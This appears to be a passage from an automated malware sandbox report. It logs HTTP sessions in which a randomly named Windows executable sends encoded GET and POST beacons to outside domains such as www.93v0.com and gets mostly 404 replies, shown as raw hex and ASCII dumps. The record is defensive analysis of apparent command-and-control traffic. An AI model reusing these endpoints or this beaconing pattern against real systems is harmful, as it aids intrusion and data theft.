May 30, 2024 15:04:24.576690912 CEST	1236	IN	Data Raw: 0b 26 9e 2d 22 14 e9 e4 0b 75 43 44 9e 09 e5 90 84 70 fa 85 da 21 22 cf 84 7a 40 82 27 55 40 0e f4 03 79 91 06 14 84 12 aa 04 d2 78 96 01 20 2c d1 80 dd b8 eb 1f d3 16 c7 19 d6 e3 71 2b f2 88 ff 40 37 b2 1c 13 b0 88 50 a4 10 42 44 9e 09 92 84 10 Data Ascii: &-"uCDp!"z@'U@yx ,q+@7PBDB3AIi(!dK4@-='&:,Ltf'`d]e"%;]0)4`?Ju0B~$WAW[~SKBM4DZbIWD%x4
May 30, 2024 15:04:24.576738119 CEST	1236	IN	Data Raw: 96 34 21 66 08 d5 04 04 92 63 42 48 40 74 00 2d 6a 40 48 40 74 14 14 8b 86 07 e8 f4 94 cb b2 3e a3 58 1d cf 76 dd 87 ad 0d 48 2e f2 8b e9 f7 ba fe 80 fb f7 76 fc 4e f7 16 1c eb a1 e4 8b 3d f6 fa 57 02 8e d2 d7 a6 12 bf a2 b2 32 0c ae 28 17 1e 2f Data Ascii: 4!fcBH@t-j@H@t>XvH.vN=W2(/lAbX0H0/VJ!`40hI1`ZA$0A5$DD<OugtyO.~r^d_ty^/5%{iX@r
May 30, 2024 15:04:24.576752901 CEST	1236	IN	Data Raw: f9 4d 62 90 fd 02 f5 51 77 f2 99 da 98 c0 10 31 a5 88 48 f4 99 90 12 11 11 89 3e 13 42 c2 10 3d 80 7c 51 03 22 42 56 b6 17 89 0e 40 b2 a4 01 bd d0 be 47 4a e0 6d 2d c8 cf ff da c7 12 5a 4f cd 7b 83 cb c4 66 a4 fd 16 c1 8c 22 02 d1 65 62 2f 52 25 Data Ascii: MbQw1H>B=\|Q"BV@GJm-ZO{f"eb/R%""]+p@{;!$r%FkN<xa>>V(~`J3QJDD$L"de{!$K/yxWf.Y\|FSo_\|=N]Jzz%k=1S`!}+0\
May 30, 2024 15:04:24.576776028 CEST	1236	IN	Data Raw: dc 9e 61 b3 1e 98 14 30 08 6d 21 28 d4 cf 1a c8 89 53 84 82 c6 40 8c 09 44 cb 44 4a 94 80 21 10 43 02 d1 32 91 11 25 40 06 da 41 44 a8 17 35 90 10 f7 77 34 03 ee 47 69 44 dc e3 31 7b c8 48 38 c7 66 49 ba 21 11 63 d0 1e 52 e2 4b c8 1a 88 89 53 c4 Data Ascii: a0m!(S@DDJ!C2%@AD5w4GiD1{H8fI!cRKSADDPQ"3%BBV577y]D9E,)"=R"""3!%m+Fn-D%ah[?j '[O.2d$DB]@rI-9d.SI,I'!<5%dg0$4
May 30, 2024 15:04:24.576792002 CEST	1236	IN	Data Raw: 3c 2b 4f 37 91 a7 65 6d 42 4f ea 66 0f 0a 6b 6c 96 24 6d 3a 4b 48 7b c0 93 c6 59 03 62 4a 63 49 11 91 e4 19 91 12 68 7a 49 20 b2 67 42 4a 44 04 cc 68 99 90 12 81 b6 80 11 35 20 a7 14 96 93 76 80 f5 b2 67 5b 4e 10 0b 4a 7b c0 c8 1a 10 e7 d1 ed 31 Data Ascii: <+O7emBOfkl$m:KH{YbJcIhzI gBJDh5 vg[NJ{1Qz4)H!$hh4di&D!S@i$3*%HEv7&ZH#jVpSr5b8$yFL9%DL4r^S0vsJI;s5
May 30, 2024 15:04:24.576807976 CEST	1236	IN	Data Raw: 7a 80 d1 78 2c 84 47 4a 92 62 c0 34 90 a2 05 85 c1 92 6d dc 37 55 43 e1 39 cd 41 b3 ec a2 7f c2 78 2d 5d 3e 0a 1e ed c3 be 3d bf f5 54 6a 47 fa 2c 94 c7 27 0b 45 f0 e8 f6 56 8f bd 5f a2 a2 2c f8 6f e1 06 02 2a c0 e0 c9 06 4c 0f 30 1a 08 48 52 0c Data Ascii: zx,GJb4m7UC9Ax-]>=TjG,'EV_,o*L0HRR0X;Hd}&,BTt}/2-0tTOSA0q!$)L>pp_Z/xo=uH56KSFYFOatI>h8&zdC+F,z@
May 30, 2024 15:04:24.581887007 CEST	1236	IN	Data Raw: 35 22 22 92 3c 23 52 02 4d 2f 09 44 f6 4c 48 89 08 0f 05 46 d2 69 49 43 22 41 60 b4 85 91 70 2a 05 c9 14 85 94 13 b4 83 91 7a 6e 4f 62 c9 04 41 0a 0a da c3 48 b8 95 82 64 97 8d 34 95 6c d1 11 b4 87 9b 92 f7 e8 b8 2d 29 dc 1e 4b a6 08 52 51 d0 1e Data Ascii: 5""<#RM/DLHFiIC"A`p*znObAHd4l-)KRQmIX"Ars,"5p[7qZ_H`tAEzNGw=sR1L=Wt[R/lSnh#Jd {a[)HF#<4^A`4a$<)T9!$4t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49752	35.214.235.206	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:26.490746021 CEST	439	OUT	GET /4iea/?aN6=3TWTWTzxVTU&I2ID3h=LPPTutp79E4NI/FTL4slzgCz9Mw5fMldsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp4zucdPe+KsM3p1oNwK6FzAkB3R3BpNYPETyLQ+W6Q8ZNIg== HTTP/1.1 Host: www.grecanici.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:04:27.108031988 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 30 May 2024 13:04:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Httpd: 1 Host-Header: 6b7412fb82ca5edfd0917e3957f05d89 X-Proxy-Cache: MISS X-Proxy-Cache-Info: 0 NC:000000 UP: Data Raw: 31 33 64 35 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 [TRUNCATED] Data Ascii: 13d52<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex" /> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { position: rel
May 30, 2024 15:04:27.108058929 CEST	1236	IN	Data Raw: 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 Data Ascii: ative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20px auto 10px; } .ti
May 30, 2024 15:04:27.108077049 CEST	368	IN	Data Raw: 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 2d 2d 62 67 5f 5f 63 Data Ascii: in: 0 auto; } @media screen and (max-width: 767px) { .error--bg__cover { display: none; } .abstract-half-dot--circle { left: 0; } }</style></head><body> <div id="container"> <section class="error cont
May 30, 2024 15:04:27.108103991 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 69 64 3d 22 61 63 63 65 37 36 37 30 2d 39 30 34 66 2d 34 66 38 63 2d 62 38 36 37 2d 36 38 31 33 38 63 32 66 38 63 30 36 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22 20 78 6d 6c 6e 73 Data Ascii: <svg id="acce7670-904f-4f8c-b867-68138c2f8c06" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1019 467"><title>404_bg</title><path d="M962.794,62.029a11.471,11.471,0,0,1-.656-22.923h0a11.471,11.471,0,0,1,1.327,22
May 30, 2024 15:04:27.108123064 CEST	1236	IN	Data Raw: 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 37 37 33 2e 33 31 36 2c 32 32 38 2e 33 33 61 31 2c 31 2c 30 2c 30 2c 31 2d 31 2d 31 2e 30 32 32 6c 2e 35 37 31 2d 32 36 2e 31 34 61 31 2c 31 2c 30 2c 30 2c 31 2c 31 2e 34 Data Ascii: ill="#226d7a"/><path d="M773.316,228.33a1,1,0,0,1-1-1.022l.571-26.14a1,1,0,0,1,1.487-.851l24.356,13.607a1,1,0,0,1-.038,1.767l-24.926,12.532A1.006,1.006,0,0,1,773.316,228.33Zm1.535-25.456-.5,22.815,21.756-10.938Z" fill="#226d7a"/><path d="M136.
May 30, 2024 15:04:27.108163118 CEST	1236	IN	Data Raw: 39 4c 31 37 2e 38 2c 32 38 31 2e 30 36 39 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 39 32 37 2e 35 33 37 6c 32 2e 34 31 39 2c 38 2e 36 36 38 41 31 2c 31 2c 30 2c 30 2c 30 2c 31 39 2e 32 35 37 2c 32 39 31 2e 30 30 36 5a 22 20 66 69 6c 6c 3d 22 23 32 Data Ascii: 9L17.8,281.069a1,1,0,0,0-1.927.537l2.419,8.668A1,1,0,0,0,19.257,291.006Z" fill="#226d7a"/><path d="M13.216,264.635a6.979,6.979,0,0,0,3.394-10.8l6.242-6.052a1,1,0,1,0-1.393-1.435L15.2,252.413A7,7,0,1,0,11,265c.08,0,.158-.009.237-.012l2.219,7.95
May 30, 2024 15:04:27.108180046 CEST	1236	IN	Data Raw: 39 37 37 2c 30 2c 30 2c 30 2d 32 2e 36 34 33 2c 31 31 2e 32 36 39 6c 2d 35 2e 38 34 35 2c 36 2e 30 32 38 61 31 2c 31 2c 30 2c 31 2c 30 2c 31 2e 34 33 36 2c 31 2e 33 39 32 4c 31 34 33 2e 34 31 39 2c 31 39 37 41 37 2c 37 2c 30 2c 31 2c 30 2c 31 34 Data Ascii: 977,0,0,0-2.643,11.269l-5.845,6.028a1,1,0,1,0,1.436,1.392L143.419,197A7,7,0,1,0,147,184Zm0,12a4.995,4.995,0,0,1-1.121-9.863,1.033,1.033,0,0,0,.155-.022c.015,0,.025-.016.04-.021A5,5,0,1,1,147,196Z" fill="#226d7a"/><path d="M52,224a7,7,0,0,0,5.9
May 30, 2024 15:04:27.108213902 CEST	1236	IN	Data Raw: 30 36 2c 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 38 39 31 2c 31 37 39 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 35 36 2e 32 39 32 2c 31 37 39 2e 34 36 39 61 36 2e 34 37 37 2c 36 2e 34 37 37 2c 30 2c 30 Data Ascii: 06,5.006,0,0,1,891,179Z" fill="#226d7a"/><path d="M956.292,179.469a6.477,6.477,0,0,0,9.659-.268l6.739,4.9a1,1,0,1,0,1.176-1.617L967,177.492a6.5,6.5,0,1,0-11.811.4,1.064,1.064,0,0,0-.121.039l-7.852,4.4a1,1,0,0,0,.976,1.745l7.853-4.4A.985.985,0,
May 30, 2024 15:04:27.108228922 CEST	1236	IN	Data Raw: 61 35 2c 35 2c 30 2c 31 2c 31 2c 35 2c 35 41 35 2e 30 30 36 2c 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 39 32 31 2c 31 39 34 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 34 31 2c 32 31 32 61 31 2c 31 2c 30 Data Ascii: a5,5,0,1,1,5,5A5.006,5.006,0,0,1,921,194Z" fill="#226d7a"/><path d="M941,212a1,1,0,0,0-1.6,1.2l5.4,7.2a1,1,0,1,0,1.6-1.2Z" fill="#226d7a"/><path d="M876.837,80.654l-1.7,7.937a1,1,0,0,0,.767,1.187,1.029,1.029,0,0,0,.211.022,1,1,0,0,0,.977-.79l1
May 30, 2024 15:04:27.108246088 CEST	1236	IN	Data Raw: 30 2c 30 2d 32 5a 22 20 66 69 6c 6c 3d 22 23 32 30 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 38 34 2c 34 31 34 68 2d 38 76 2d 38 61 31 2c 31 2c 30 2c 30 2c 30 2d 32 2c 30 76 38 68 2d 38 61 31 2c 31 2c 30 2c 30 2c 30 2c 30 2c 32 68 38 Data Ascii: 0,0-2Z" fill="#206d7a"/><path d="M984,414h-8v-8a1,1,0,0,0-2,0v8h-8a1,1,0,0,0,0,2h8v8a1,1,0,0,0,2,0v-8h8a1,1,0,0,0,0-2Z" fill="#206d7a"/><path d="M800,9h-8V1a1,1,0,0,0-2,0V9h-8a1,1,0,0,0,0,2h8v8a1,1,0,0,0,2,0V11h8a1,1,0,0,0,0-2Z" fill="#206d7a"
May 30, 2024 15:04:27.113328934 CEST	1236	IN	Data Raw: 38 20 31 35 36 2e 30 31 35 20 31 32 32 2e 30 34 31 20 31 35 37 2e 38 35 34 20 31 31 39 2e 39 32 38 20 31 35 36 2e 30 31 35 20 31 31 37 2e 38 31 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 Data Ascii: 8 156.015 122.041 157.854 119.928 156.015 117.814" fill="#fff"/><polygon points="156.015 106.008 154.177 108.122 156.015 110.235 157.854 108.122 156.015 106.008" fill="#fff"/><polygon points="156.015 94.202 154.177 96.316 156.015 98.429 157.85

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49753	18.178.206.118	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:41.047717094 CEST	682	OUT	POST /hcaw/ HTTP/1.1 Host: www.93v0.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.93v0.com Referer: http://www.93v0.com/hcaw/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 61 59 52 66 69 5a 70 71 69 6e 6b 42 33 75 42 44 65 74 77 74 76 68 52 70 78 72 53 67 58 33 4a 46 2f 56 75 67 4b 50 31 36 42 41 63 59 75 6f 69 43 6d 37 65 6d 4c 6b 68 5a 33 32 6c 61 50 34 6e 4b 31 50 47 6b 76 63 72 44 51 53 64 64 32 67 7a 68 6a 69 6e 49 6c 58 6e 57 30 4d 73 2b 74 79 4c 59 7a 4d 32 54 39 5a 72 4b 74 4a 74 74 36 66 41 33 43 44 2b 79 6a 44 55 36 5a 2b 2f 59 6f 61 57 56 4f 56 39 58 65 4d 33 32 71 48 66 47 66 47 34 37 65 74 61 54 4f 7a 4f 72 36 6e 7a 4c 4a 51 72 4c 76 55 37 63 6f 4e 6a 6b 59 68 46 6a 41 4c 57 52 32 78 2f 71 72 64 6b 68 75 44 56 54 48 72 62 44 31 2f 73 72 5a 38 6f 3d Data Ascii: I2ID3h=aYRfiZpqinkB3uBDetwtvhRpxrSgX3JF/VugKP16BAcYuoiCm7emLkhZ32laP4nK1PGkvcrDQSdd2gzhjinIlXnW0Ms+tyLYzM2T9ZrKtJtt6fA3CD+yjDU6Z+/YoaWVOV9XeM32qHfGfG47etaTOzOr6nzLJQrLvU7coNjkYhFjALWR2x/qrdkhuDVTHrbD1/srZ8o=
May 30, 2024 15:04:41.847141027 CEST	367	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:04:41 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49754	18.178.206.118	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:43.592360020 CEST	702	OUT	POST /hcaw/ HTTP/1.1 Host: www.93v0.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.93v0.com Referer: http://www.93v0.com/hcaw/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 61 59 52 66 69 5a 70 71 69 6e 6b 42 78 50 52 44 59 4f 59 74 6b 68 52 32 39 4c 53 67 43 48 4a 42 2f 56 53 67 4b 4f 42 55 41 32 6b 59 74 4a 53 43 68 36 65 6d 43 30 68 5a 2f 57 6c 44 42 59 6e 2f 31 50 4c 45 76 64 37 44 51 53 4a 64 32 69 37 68 69 52 50 58 6e 48 6d 77 34 73 73 77 79 69 4c 59 7a 4d 32 54 39 61 58 73 74 4a 6c 74 37 75 77 33 44 6d 4c 6b 38 7a 55 31 50 4f 2f 59 6a 36 58 53 4f 56 38 43 65 4a 75 6a 71 45 33 47 66 44 55 37 65 2f 2b 51 41 7a 4f 58 30 48 79 70 41 52 32 52 6c 46 7a 4d 6e 74 53 66 41 44 51 59 42 39 37 37 73 54 33 43 34 39 49 5a 2b 51 64 6b 57 62 36 71 76 63 38 62 48 72 2f 62 36 2b 2b 72 68 4f 4d 44 5a 6b 56 47 67 62 65 39 4d 42 55 78 Data Ascii: I2ID3h=aYRfiZpqinkBxPRDYOYtkhR29LSgCHJB/VSgKOBUA2kYtJSCh6emC0hZ/WlDBYn/1PLEvd7DQSJd2i7hiRPXnHmw4sswyiLYzM2T9aXstJlt7uw3DmLk8zU1PO/Yj6XSOV8CeJujqE3GfDU7e/+QAzOX0HypAR2RlFzMntSfADQYB977sT3C49IZ+QdkWb6qvc8bHr/b6++rhOMDZkVGgbe9MBUx
May 30, 2024 15:04:44.390860081 CEST	367	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:04:44 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49755	18.178.206.118	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:46.132203102 CEST	1719	OUT	POST /hcaw/ HTTP/1.1 Host: www.93v0.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.93v0.com Referer: http://www.93v0.com/hcaw/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 61 59 52 66 69 5a 70 71 69 6e 6b 42 78 50 52 44 59 4f 59 74 6b 68 52 32 39 4c 53 67 43 48 4a 42 2f 56 53 67 4b 4f 42 55 41 32 73 59 74 37 71 43 68 5a 6d 6d 59 30 68 5a 6a 47 6c 47 42 59 6e 69 31 50 44 49 76 59 6a 54 51 51 78 64 30 48 33 68 79 30 37 58 75 48 6d 77 6c 38 73 39 74 79 4b 46 7a 4e 48 62 39 5a 2f 73 74 4a 6c 74 37 74 34 33 58 44 2f 6b 76 6a 55 36 5a 2b 2b 5a 6f 61 58 32 4f 56 6b 53 65 4a 69 7a 71 56 58 47 66 6a 45 37 5a 4e 6d 51 49 7a 4f 56 6b 58 79 50 41 52 37 50 6c 46 2f 41 6e 74 57 6c 41 42 41 59 4d 36 43 35 33 52 7a 49 75 74 41 57 36 77 4a 42 41 37 32 66 76 38 35 6f 62 72 72 46 77 2b 2b 56 73 5a 49 4f 61 31 55 52 33 73 53 5a 4a 42 6f 39 6f 49 64 4e 6e 69 2b 53 69 63 6c 67 68 71 6e 48 69 33 4e 69 62 67 56 66 6e 71 30 4d 50 43 61 4d 4c 68 51 38 54 30 50 6a 77 67 75 5a 56 70 71 35 72 71 76 30 34 5a 32 56 78 69 32 5a 4f 51 55 35 4d 50 6e 76 70 62 6a 43 79 77 37 61 46 66 33 49 71 7a 6f 31 48 47 75 65 4a 6c 36 55 55 73 58 4d 6c 6f 64 66 7a 63 6a 4f 51 4c 48 4f 34 4a 73 [TRUNCATED] Data Ascii: I2ID3h=aYRfiZpqinkBxPRDYOYtkhR29LSgCHJB/VSgKOBUA2sYt7qChZmmY0hZjGlGBYni1PDIvYjTQQxd0H3hy07XuHmwl8s9tyKFzNHb9Z/stJlt7t43XD/kvjU6Z++ZoaX2OVkSeJizqVXGfjE7ZNmQIzOVkXyPAR7PlF/AntWlABAYM6C53RzIutAW6wJBA72fv85obrrFw++VsZIOa1UR3sSZJBo9oIdNni+SiclghqnHi3NibgVfnq0MPCaMLhQ8T0PjwguZVpq5rqv04Z2Vxi2ZOQU5MPnvpbjCyw7aFf3Iqzo1HGueJl6UUsXMlodfzcjOQLHO4JsFljx230GuGI1Lh+bIiOi1DfmXuegr2Tx47scP7A15Naw6evioe3zKduPsYP6k2jvdzkND3rtDuF+9DbCykpHd914ImqIzNQkAMvL/ErTklO9AUmvCPuDj5Bwj2D9zK5dSjhHFouEltHlpEQGrR2wv4rFo1N1e+lyfC1xEF1ZInmw/UZsYe89LF+OtBk9ERv2ye90u2iWnNiEpZxLMPMS0nZpTondHTO0KJ9vqcbrRiSQPcvp1WA96IPy3Y8S76TGaeLse1WlmOShGbyqYLxCMxTAYyt8fBHdQxk/J7FV+h/eubljsFka1VwyvT+wrc5OfhJTKNtiB5Pmigg8KT5D74H8j3E91Ud2yh/PpSO94WsBqbHFkDeJ+gb914+dNjfKSzhssjtFgnDtX3MUBtWiFn9Sp+SM7uP/FoZ0g55pJ/n6eMyWlcecw9pbKKhhX1B19B/4nsUIbCcV0NUy1OR3ZEJDZihgIQj+uVi1lBw+ZlYODvEfuREtY7aHsh13Qab2+f4+0j+8QqB655zODeclpdZ60L5yJM81692znYamJqtOzN1EIGzBHuyjvg9JZTL+HHx2xK/FlmwlNrgWpgu8GuhM3VoJKU+5em1Pmv+P0DONdiKAI47Wu9KVJRz+rW27EtfDrGhe9qtV5OD1e8KKxz1SctmZ+110nU [TRUNCATED]
May 30, 2024 15:04:46.911997080 CEST	367	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:04:46 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49756	18.178.206.118	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
